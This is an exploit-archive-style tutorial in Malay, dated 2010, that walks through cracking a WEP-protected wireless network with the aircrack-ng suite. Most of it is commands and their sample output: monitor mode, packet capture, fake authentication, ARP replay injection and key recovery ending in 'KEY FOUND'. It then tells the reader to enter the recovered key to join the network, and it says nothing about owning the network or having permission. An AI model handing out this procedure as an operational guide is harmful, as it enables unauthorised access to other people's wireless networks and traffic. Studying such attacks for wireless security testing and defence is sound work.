# Exploit Title: [Bahasa Melayu] - Asas crack WEP dengan aircrack-ng
# Date: 22 Jan 2010
# Author: r3v3r7
# Thankz to: n3wb0rn, HMsec, TBDsec..
# Software Link: http://www.aircrack-ng.org/
# Tested on: Debian and its inheritance
--------------------------------------------------------
Permulaan:
--------------------------------------------------------
Dapatkan dan install packages aircrack-ng yg terbaru di:
http://www.aircrack-ng.org/
#apt-get install aircrack-ng <--- utk debian dan distro yg berasaskannya
--------------------------------------------------------
Langkah-langkah:
--------------------------------------------------------
Selepas install, mulakan monitor mode:
# airmon-ng start [interface]
cth output:
-----------------------------------------------------------------------
| PID Name |
| 5045 NetworkManager |
| 5052 wpa_supplicant |
| 5069 avahi-daemon |
| 5070 avahi-daemon |
| 5371 dhclient |
| 11179 dhclient |
| Process with PID 11179 (dhclient) is running on interface wlan0 |
| |
| Interface Chipset Driver |
| |
| wlan0 Intel 3945ABG iwl3945 – [phy0] |
| (monitor mode enabled on mon0) |
-----------------------------------------------------------------------
Nota:
------------------------------------------------------
| wlan0 <— interface asal |
| mon0 <— interface monitor mode |
| utk check: type ifconfig |
| dalam ifconfig, HWaddr ialah MAC address |
------------------------------------------------------
kemudian, scan senarai wireless network di kawasan anda:
# iwlist [interface] scan <---bukan interface monitor mode
output sample:
---------------------------------------------------------------
| mon0 Scan completed : |
| Cell 01 – Address: 00:30:4F:59:E5:A4 |
| ESSID:”test” |
| Mode:Master |
| Channel:11 |
| Frequency:2.462 GHz (Channel 11) |
| Quality=49/100 Signal level:-79 dBm Noise level=-89 dBm |
| Encryption key:on |
| Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s |
| 12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s |
| 48 Mb/s; 54 Mb/s |
| Extra:tsf=0000013be8058181 |
| Extra: Last beacon: 24ms ago |
---------------------------------------------------------------
Nota utk diingat:
---------------------------------------------------------------
| 00:30:4F:59:E5:A4 <—-access point mac address |
| Channel:11 <—- channel yg digunakan |
| Encryption key:on <——menunjukkan yg ia mempunyai encryption |
---------------------------------------------------------------
OK, terdapat dua cara untuk crack iaitu INTERACTIVE ATTACK dan FAKE AUTHENTICATION…
Disini, saya sarankan cara kedua, FAKE AUTHENTICATION, ia lebih mudah…
------------------------------------------------------------
| 1) airodump-ng – capture paket |
| 2) aireplay-ng – serangan modes fake authentication |
| 3) aireplay-ng – serangan modes arpreplay |
| 4) aircrack-ng – crack WEP , WPA |
------------------------------------------------------------
Pastikan anda jalankan command sebagai ROOT didalam tab yg berbeza. disini, saya syorkan "terminator" selain "terminal"..dan pastikan buat direktori baru dan lakukan proses cracking dlm satu folder supaya file tidak serabut.
1) #airodump-ng -c 11 --bssid 00:30:4F:59:E5:A4 -w output mon0
---------------------------------------------------------
| -c : nombor channel |
| --bssid : MAC Address utk Access Point |
| -w : utk simpan fail |
| output : nama fail utk .cap |
| mon0 : nama interface <--mungkin berbeza dgn anda |
---------------------------------------------------------
cth output:
----------------------------------------------------------------
| CH 11 ][ Elapsed: 20 s ][ 2009-06-11 12:16 |
| |
| BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID |
| |
| 00:30:4F:59:E7:17 -86 100 167 4 0 11 54 WEP WEP test |
| |
| BSSID STATION PWR Rate Lost Packets Probes |
----------------------------------------------------------------
2) #aireplay-ng --fakeauth 6000 -o 1 -q 10 -e test -a 00:30:4F:59:E5:A4 -h 00:1b:77:9d:f4:1b mon0
------------------------------------------------------------------------
| --fakeauth 6000 : attack modes |
| -o 1 : hanya hantar satu set di satu masa |
| -q 10 : hantar paket baru setiap 10 saat |
| -e : nama Access Point |
| -a : MAC Address utk Access Point |
| -h : MAC Address sendiri <--------utk lihat MAC Address, #ifconfig |
| mon0 : nama interface |
------------------------------------------------------------------------
cth output:
--------------------------------------------------------------------------
| 12:23:20 Sending Authentication Request (Open System) [ACK] |
| 12:23:20 Authentication successful |
| 12:23:20 Sending Association Request [ACK] |
| 12:23:20 Association successful (AID: 1) |
| 12:23:30 Sending keep-alive packet [ACK] |
| 12:23:40 Sending keep-alive packet [ACK] |
| 12:23:50 Sending keep-alive packet [ACK] |
--------------------------------------------------------------------------
3) aireplay-ng --arpreplay -b 00:30:4F:59:E5:A4 -h 00:1b:77:9d:f4:1b mon0
----------------------------------------------
| --arpreplay : attack modes |
| -b : MAC Address utk Access Point |
| -h : MAC Address sendiri |
| mon0 : interface monitor |
----------------------------------------------
cth output:
--------------------------------------------------------------------------------------
| Read 68178 packets (got 23082 ARP requests and 12190 ACKs), sent 14173 packets… |
| Read 68401 packets (got 23176 ARP requests and 12240 ACKs), sent 14223 packets… |
| Read 68583 packets (got 23249 ARP requests and 12283 ACKs), sent 14274 packets… |
| Read 68753 packets (got 23331 ARP requests and 12330 ACKs), sent 14323 packets… |
| Read 68949 packets (got 23399 ARP requests and 12366 ACKs), sent 14373 packets… |
--------------------------------------------------------------------------------------
Kemudian tunggu sehingga paket ARP banyak … 50000 ARP sudah memadai…
4) aircrack-ng -b 00:30:4F:59:E5:A4 output*.cap
--------------------------------------------------------------------------------------------------------------
| -b : MAC Address utk Access Point |
| output.cap : fail dari ARP yg disimpan |
| * : utk pilih semua fail .cap (boleh guna *.cap kerana semua fail .cap sudah dibuat dalam satu folder) |
--------------------------------------------------------------------------------------------------------------
cth output:
-----------------------------------------------------------------------------------------
| KB depth byte(vote) |
| 0 0/ 1 10(532736) 56(412160) FF(410880) 88(407552) D8(406784) 1F(406016) |
| D7(406016) EE(406016) 08(405248) 7D(404736) BD(404480) C3(403712) 0E(402432) |
| 61(402432)1 0/ 1 10(526848) 00(411648) 3A(410368) FE(410112) 23(409088) |
| 3B(409088) 82(407040) FC(405760) DB(405504) 16(404992) 8E(404736) C2(404736) |
| 6B(404480) A1(404480)2 0/ 1 10(513536) 3A(411136) 78(410368) 73(409600) |
| 03(408064) 6A(407552) 1C(407296) 34(406784) FF(405504) 53(404736) 98(404480) |
| D0(404480) 33(403712) 15(403456)3 7/256 10(407040) 4E(405760) CE(405760) |
| 27(405504) E5(404992) 17(404736) 4B(404736) 68(404736) F9(404480) 36(404480) |
| 78(404224) 84(404224) B0(403968) D8(402944) 4 68/243 84(394240) 47(393984) |
| 70(393984) 8D(393984) C5(393984) 83(393728) 60(393472) E2(393472) 3B(393216) |
| 29(392960) 37(392960) 74(392960) 2A(392704) 89(392704) |
| |
| KEY FOUND! [ 10:10:10:10:11] |
| Decrypted correctly: 100% |
-----------------------------------------------------------------------------------------
akhir sekali, masukkan key tadi tanpa tanda dua titik bertindih (:).. cth: 1010101011
Anda juga boleh cuba "wesside-ng" utk lebih pantas crack WEP..
ps:// agak susah utk terangkan dalam bahasa melayu..=)
